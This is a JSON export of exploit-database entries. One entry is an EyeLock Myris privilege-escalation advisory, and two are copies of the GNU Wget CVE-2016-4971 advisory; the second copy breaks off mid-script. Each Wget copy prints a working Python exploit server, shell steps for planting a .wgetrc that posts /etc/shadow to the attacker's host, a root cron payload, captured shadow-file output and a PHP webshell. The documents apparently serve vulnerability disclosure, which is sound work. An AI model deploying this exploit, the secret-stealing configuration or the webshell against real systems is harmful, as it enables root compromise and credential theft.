{"zdt": [{"lastseen": "2018-04-14T23:54:01", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2016-08-10T00:00:00", "published": "2016-08-10T00:00:00", "id": "1337DAY-ID-25631", "href": "https://0day.today/exploit/description/25631", "type": "zdt", "title": "EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation", "sourceData": "EyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation\r\n \r\n \r\nVendor: EyeLock, LLC\r\nProduct web page: http://www.eyelock.com\r\nAffected version: 3.3.21289.1311\r\n \r\nSummary: myris\u00ae provides unparalleled security, is portable, lightweight\r\nand is as easy as looking in a mirror. Use myris to quickly and easily\r\nenroll users for EyeLock\u2019s access control products or to grant users\r\naccess to corporate domain environments within seconds\u2014users never have\r\nto type their username and password again.\r\n \r\nDesc: The application suffers from an unquoted search path issue impacting\r\nthe service 'MyrisService' for Windows deployed as part of the Myris solution.\r\nThis could potentially allow an authorized but non-privileged local user to\r\nexecute arbitrary code with elevated privileges on the system. A successful\r\nattempt would require the local user to be able to insert their code in the\r\nsystem root path undetected by the OS or other security applications where\r\nit could potentially be executed during application startup or reboot. 
If\r\nsuccessful, the local user\u2019s code would execute with the elevated privileges\r\nof the application.\r\n \r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5355\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php\r\n \r\n \r\n10.06.2016\r\n \r\n--\r\n \r\n \r\nC:\\Users\\joxy>sc qc MyrisService\r\n[SC] QueryServiceConfig SUCCESS\r\n \r\nSERVICE_NAME: MyrisService\r\n TYPE : 10 WIN32_OWN_PROCESS\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Eyelock Corporation\\MyrisSDK\\bin\\MyrisService.exe\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Myris SDK Service\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25631"}, {"lastseen": "2018-04-08T23:45:07", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "id": "1337DAY-ID-25433", "href": "https://0day.today/exploit/description/25433", "type": "zdt", "title": "GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. 
\r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n \r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n \r\nhttps://www.gnu.org/software/wget/\r\n \r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nBecause of a lack of sufficient controls in wget, when a user downloads a file \r\nwith wget, such as:\r\n \r\nwget http://attackers-server/safe_file.txt\r\n \r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith arbitrary contents and an arbitrary filename by issuing a crafted HTTP 30X Redirect \r\ncontaining an FTP server reference in response to the victim's wget request. \r\n \r\nFor example, if the attacker's server replies with the following response:\r\n \r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n \r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. 
\r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. \r\n \r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n \r\nExecution flow:\r\n \r\nvictim@trusty:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n \r\nvictim@trusty:~$ pwd\r\n/home/victim\r\n \r\nvictim@trusty:~$ ls\r\nvictim@trusty:~$ \r\n \r\nvictim@trusty:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u2018.bash_profile\u2019\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... done.\r\nLength: 55 (unauthoritative)\r\n \r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n \r\n2016-02-19 04:50:37 (1.27 MB/s) - \u2018.bash_profile\u2019 saved [55]\r\n \r\n \r\nvictim@trusty:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\nvictim@trusty:~$ \r\n \r\n \r\nThis vulnerability will not work if extra options that force the destination\r\nfilename are specified as a parameter, such as -O /tmp/output.\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n \r\nAnother limitation is that an attacker exploiting this vulnerability can only\r\nupload their malicious file to the current directory from which wget was run, \r\nor to a directory specified by the -P option (directory_prefix option).\r\nThis could however be enough to exploit wget run from a home directory, or\r\nwithin a web document root (in which case the attacker could write malicious PHP files\r\nor .bash_profile files).\r\n \r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n \r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as the destination directory for all downloaded files in future,\r\nas well as a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers, to which they could send further \r\nmalicious responses.\r\n \r\n \r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n \r\ndir_prefix = string\r\n Top of directory tree\u2014the same as \u2018-P string\u2019.\r\n \r\npost_file = file\r\n Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u2018--post-file=file\u2019.\r\n \r\nrecursive = on/off\r\n Recursive on/off\u2014the same as \u2018-r\u2019.\r\n \r\ntimestamping = on/off\r\n Allows existing files to be overwritten.\r\n \r\ncut_dirs = n\r\n Ignore n remote directory components. 
Allows an attacker to create directories with wget (when combined with the recursive option).\r\n \r\nhttp_proxy \r\n HTTP Proxy server\r\n \r\nhttps_proxy \r\n HTTPS Proxy server\r\n \r\noutput_document = file\r\n Set the output filename\u2014the same as \u2018-O file\u2019.\r\n \r\ninput = file\r\n Read the URLs from string, like \u2018-i file\u2019.\r\n \r\nmetalink-over-http\r\n Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n \r\n \r\n \r\nThe full list of .wgetrc options can be found at:\r\n \r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n \r\n \r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n \r\n \r\n1) Cronjob with wget scenario\r\n \r\nOften wget is used inside cronjobs. By default cronjobs run within the home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications to download \r\nnew versions of databases, or to request web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. \r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n \r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n \r\nSuch a setup could be abused by attackers to upload a .bash_profile file through the\r\nwget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. 
\r\n \r\nAs cron runs periodically, attackers could also write out a .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them almost instant root code \r\nexecution.\r\n \r\n \r\nIt is worth noting that if an attacker had access to the local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n \r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. \r\nIn many cases the cron jobs (as in the examples above) are set up to request \r\nvarious web scripts, e.g.: \r\nhttp://localhost/clean-cache.php \r\n \r\nIf the file was writable by apache, and the attacker had access to the www-data/apache \r\naccount, they could modify it to return a malicious Location header and exploit the \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n \r\n \r\nFor simplicity we can assume that the attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n \r\nThe root cronjob on the victim server may look as follows:\r\n \r\nroot@victim:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n \r\n \r\nIn order to exploit this setup, the attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n \r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n \r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n \r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n \r\n \r\nAt this point the attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the 
victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n \r\n#!/usr/bin/env python\r\n \r\n#\r\n# Wget < 1.18 Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971\r\n#\r\n \r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket\r\n \r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n    def do_GET(self):\r\n        # This takes care of sending .wgetrc\r\n \r\n        print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n        if \"Wget\" not in self.headers.getheader('User-Agent', ''):\r\n            print \"But it's not a Wget :( \\n\"\r\n            self.send_response(200)\r\n            self.end_headers()\r\n            self.wfile.write(\"Nothing to see here...\")\r\n            return\r\n \r\n        print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n        self.send_response(301)\r\n        new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n        print \"Sending redirect to %s \\n\"%(new_path)\r\n        self.send_header('Location', new_path)\r\n        self.end_headers()\r\n \r\n    def do_POST(self):\r\n        # In here we will receive extracted file and install a PoC cronjob\r\n \r\n        print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n        if \"Wget\" not in self.headers.getheader('User-Agent', ''):\r\n            print \"But it's not a Wget :( \\n\"\r\n            self.send_response(200)\r\n            self.end_headers()\r\n            self.wfile.write(\"Nothing to see here...\")\r\n            return\r\n \r\n        content_len = int(self.headers.getheader('content-length', 0))\r\n        post_body = self.rfile.read(content_len)\r\n        print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n \r\n        print \"Sending back a cronjob script as a thank-you for the file...\"\r\n        print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\r\n        self.send_response(200)\r\n        self.send_header('Content-type', 'text/plain')\r\n        self.end_headers()\r\n        self.wfile.write(ROOT_CRON)\r\n \r\n        print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n \r\n        return\r\n \r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n \r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n \r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n \r\nprint \"Ready? Is your FTP server running?\"\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n    print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n    print \"FTP is down :( Exiting.\"\r\n    exit(1)\r\n \r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n \r\nhandler.serve_forever()\r\n \r\n \r\n---[ eof ]---\r\n \r\n \r\n \r\nThe attacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n \r\nThe output should look similar to:\r\n \r\n \r\n---[ wget-exploit.py output ]---\r\n \r\nattackers-server# python ./wget-exploit.py \r\n \r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n \r\nServing wget exploit on port 80...\r\n \r\n \r\nWe have a volunteer requesting /database.db by GET :)\r\n \r\nUploading .wgetrc via ftp redirect vuln. 
It should land in /root \r\n \r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \r\n \r\nWe have a volunteer requesting /database.db by POST :)\r\n \r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n \r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n \r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n \r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \r\n \r\n---[ output eof ]---\r\n \r\n \r\nAs we can see .wgetrc got uploaded by the exploit. 
It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back the shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n \r\n \r\nroot@victim:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n \r\nroot@victim:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\n \r\n2) PHP web application scenario\r\n \r\nIf wget is used within a PHP script e.g.:\r\n \r\n<?php\r\n \r\n// Update geoip data\r\n \r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\"); \r\n \r\n?>\r\n \r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n \r\n<?php\r\n //webshell.php\r\n \r\n system($_GET['cmd']);\r\n?>\r\n \r\nby using the wget-exploit script described in example 1.\r\n \r\nAfter the upload they could simply execute the script and their shell\r\ncommand by a GET request to:\r\n \r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker remote access to the\r\nsystem, or privilege escalation. It could be possible for attackers to escalate\r\nto the root user if wget is run via a root cronjob, as is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n \r\n \r\nVII. 
SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com\r\n \r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n \r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n \r\nX. CREDITS\r\n-------------------------\r\n \r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25433"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:23", "bulletinFamily": "exploit", "description": "", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "href": "https://packetstormsecurity.com/files/137795/GNU-Wget-Arbitrary-File-Upload-Potential-Remote-Code-Execution.html", "id": "PACKETSTORM:137795", "type": "packetstorm", "title": "GNU Wget Arbitrary File Upload / Potential Remote Code Execution", "sourceData": "`============================================= \n- Release date: 06.07.2016 \n- Discovered by: Dawid Golunski \n- Severity: High \n- CVE-2016-4971 \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nGNU Wget < 1.18 Arbitrary File Upload / Potential RCE \n \n \nII. BACKGROUND \n------------------------- \n \n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc. \n \nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy \n\" \n \nhttps://www.gnu.org/software/wget/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \ncompromised web server) can be tricked into saving an arbitrary remote file \nsupplied by an attacker, with arbitrary contents and filename under \nthe current directory and possibly other directories by writing to .wgetrc. 
\nDepending on the context in which wget is used, this can lead to remote code \nexecution and even root privilege escalation if wget is run via a root cronjob \nas is often the case in many web application deployments. \nThe vulnerability could also be exploited by well-positioned attackers within \nthe network who are able to intercept/modify the network traffic. \n \n \nIV. DESCRIPTION \n------------------------- \n \nBecause of a lack of sufficient controls in wget, when a user downloads a file \nwith wget, such as: \n \nwget http://attackers-server/safe_file.txt \n \nan attacker who controls the server could make wget create an arbitrary file \nwith arbitrary contents and an arbitrary filename by issuing a crafted HTTP 30X Redirect \ncontaining an FTP server reference in response to the victim's wget request. \n \nFor example, if the attacker's server replies with the following response: \n \nHTTP/1.1 302 Found \nCache-Control: private \nContent-Type: text/html; charset=UTF-8 \nLocation: ftp://attackers-server/.bash_profile \nContent-Length: 262 \nServer: Apache \n \nwget will automatically follow the redirect and will download a malicious \n.bash_profile file from a malicious FTP server. \nIt will fail to rename the file to the originally requested filename of \n'safe_file.txt' as it would normally do, in case of a redirect to another \nHTTP resource with a different name. \n \nBecause of this vulnerability, an attacker is able to upload an arbitrary file \nwith an arbitrary filename to the victim's current directory. \n \nExecution flow: \n \nvictim@trusty:~$ wget --version | head -n1 \nGNU Wget 1.17 built on linux-gnu. \n \nvictim@trusty:~$ pwd \n/home/victim \n \nvictim@trusty:~$ ls \nvictim@trusty:~$ \n \nvictim@trusty:~$ wget http://attackers-server/safe-file.txt \nResolving attackers-server... 192.168.57.1 \nConnecting to attackers-server|192.168.57.1|:80... connected. \nHTTP request sent, awaiting response... 
302 Found \nLocation: ftp://192.168.57.1/.bash_profile [following] \n=> \u2018.bash_profile\u2019 \nConnecting to 192.168.57.1:21... connected. \nLogging in as anonymous ... Logged in! \n==> SYST ... done. ==> PWD ... done. \n==> TYPE I ... done. ==> CWD not needed. \n==> SIZE .bash_profile ... 55 \n==> PASV ... done. ==> RETR .bash_profile ... done. \nLength: 55 (unauthoritative) \n \n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s \n \n2016-02-19 04:50:37 (1.27 MB/s) - \u2018.bash_profile\u2019 saved [55] \n \n \nvictim@trusty:~$ ls -l \ntotal 4 \n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile \nvictim@trusty:~$ \n \n \nThis vulnerability will not work if extra options that force the destination \nfilename are specified as a parameter, such as -O /tmp/output. \nIt is however possible to exploit the issue with mirroring/recursive options \nenabled such as -r or -m. \n \nAnother limitation is that an attacker exploiting this vulnerability can only \nupload their malicious file to the current directory from which wget was run, \nor to a directory specified by the -P option (directory_prefix option). \nThis could however be enough to exploit wget run from a home directory, or \nwithin a web document root (in which case the attacker could write malicious PHP files \nor .bash_profile files). \n \nThe current directory limitation could also be bypassed by uploading a .wgetrc \nconfig file if wget was run from a home directory. \n \nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget \nsettings such as the destination directory for all downloaded files in future, \nas well as a proxy setting to make future requests go through a malicious \nproxy server belonging to the attackers, to which they could send further \nmalicious responses. 
\n \n \nHere is a set of Wget settings that can be helpful to an attacker: \n \ndir_prefix = string \nTop of directory tree\u2014the same as \u2018-P string\u2019. \n \npost_file = file \nUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u2018--post-file=file\u2019. \n \nrecursive = on/off \nRecursive on/off\u2014the same as \u2018-r\u2019. \n \ntimestamping = on/off \nAllows existing files to be overwritten. \n \ncut_dirs = n \nIgnore n remote directory components. Allows an attacker to create directories with wget (when combined with the recursive option). \n \nhttp_proxy \nHTTP Proxy server \n \nhttps_proxy \nHTTPS Proxy server \n \noutput_document = file \nSet the output filename\u2014the same as \u2018-O file\u2019. \n \ninput = file \nRead the URLs from string, like \u2018-i file\u2019. \n \nmetalink-over-http \nIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \nThen it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download. \n \n \n \nThe full list of .wgetrc options can be found at: \n \nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands \n \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n1) Cronjob with wget scenario \n \nOften wget is used inside cronjobs. By default cronjobs run within the home \ndirectory of the cronjob owner. \nSuch wget cronjobs are commonly used with many applications to download \nnew versions of databases, or to request web scripts that perform scheduled tasks \nsuch as rebuilding indexes, cleaning caches etc. 
\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \nthe Internet with exploitable wget cronjobs: \n \nhttps://codex.wordpress.org/Post_to_your_blog_using_email \nhttps://docs.moodle.org/2x/ca/Cron \nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site \nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel \n \nSuch a setup could be abused by attackers to upload a .bash_profile file through the \nwget vulnerability and run commands in the context of the victim user upon \ntheir next log-in. \n \nAs cron runs periodically, attackers could also write out a .wgetrc file in the \nfirst response and then write to /etc/cron.d/malicious-cron in the second. \nIf a cronjob is run by root, this would give them almost instant root code \nexecution. \n \n \nIt is worth noting that if an attacker had access to the local network they could \npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \nresponses to wget requests. \n \nThis issue could also be exploited by attackers who have already gained \naccess to the server through a web vulnerability to escalate their privileges. \nIn many cases the cron jobs (as in the examples above) are set up to request \nvarious web scripts, e.g.: \nhttp://localhost/clean-cache.php \n \nIf the file was writable by apache, and the attacker had access to the www-data/apache \naccount, they could modify it to return a malicious Location header and exploit the \nroot cronjob that runs the wget request in order to escalate their privileges \nto root. \n \n \nFor simplicity we can assume that the attacker already has control over the server \nthat the victim sends the request to with wget. 
\n \nThe root cronjob on the victim server may look as follows: \n \nroot@victim:~# cat /etc/cron.d/update-database \n# Update database file every 2 minutes \n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1 \n \n \nIn order to exploit this setup, the attacker first prepares a malicious .wgetrc \nand starts an FTP server: \n \nattackers-server# mkdir /tmp/ftptest \nattackers-server# cd /tmp/ftptest \n \nattackers-server# cat <<_EOF_>.wgetrc \npost_file = /etc/shadow \noutput_document = /etc/cron.d/wget-root-shell \n_EOF_ \n \nattackers-server# sudo pip install pyftpdlib \nattackers-server# python -m pyftpdlib -p21 -w \n \n \nAt this point the attacker can start an HTTP server which will exploit wget by \nsending malicious redirects to the victim wget's requests: \n \n---[ wget-exploit.py ]--- \n \n#!/usr/bin/env python \n \n# \n# Wget < 1.18 Arbitrary File Upload Exploit \n# Dawid Golunski \n# dawid( at )legalhackers.com \n# \n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n# \n# CVE-2016-4971 \n# \n \nimport SimpleHTTPServer \nimport SocketServer \nimport socket \n \nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): \n    def do_GET(self): \n        # This takes care of sending .wgetrc \n \n        print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\" \n        if \"Wget\" not in self.headers.getheader('User-Agent', ''): \n            print \"But it's not a Wget :( \\n\" \n            self.send_response(200) \n            self.end_headers() \n            self.wfile.write(\"Nothing to see here...\") \n            return \n \n        print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\" \n        self.send_response(301) \n        new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) ) \n        print \"Sending redirect to %s \\n\"%(new_path) \n        self.send_header('Location', new_path) \n        self.end_headers() \n \n    def do_POST(self): \n        # In here we will receive extracted file and install a PoC cronjob \n \n        print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\" \n        if \"Wget\" not in self.headers.getheader('User-Agent', ''): \n            print \"But it's not a Wget :( \\n\" \n            self.send_response(200) \n            self.end_headers() \n            self.wfile.write(\"Nothing to see here...\") \n            return \n \n        content_len = int(self.headers.getheader('content-length', 0)) \n        post_body = self.rfile.read(content_len) \n        print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body) \n \n        print \"Sending back a cronjob script as a thank-you for the file...\" \n        print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\" \n        self.send_response(200) \n        self.send_header('Content-type', 'text/plain') \n        self.end_headers() \n        self.wfile.write(ROOT_CRON) \n \n        print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\" \n \n        return \n \nHTTP_LISTEN_IP = '192.168.57.1' \nHTTP_LISTEN_PORT = 80 \nFTP_HOST = '192.168.57.1' \nFTP_PORT = 21 \n \nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\" \n \nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint \"Ready? Is your FTP server running?\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nresult = sock.connect_ex((FTP_HOST, FTP_PORT)) \nif result == 0: \n    print \"FTP found open on %s:%s. Let's go 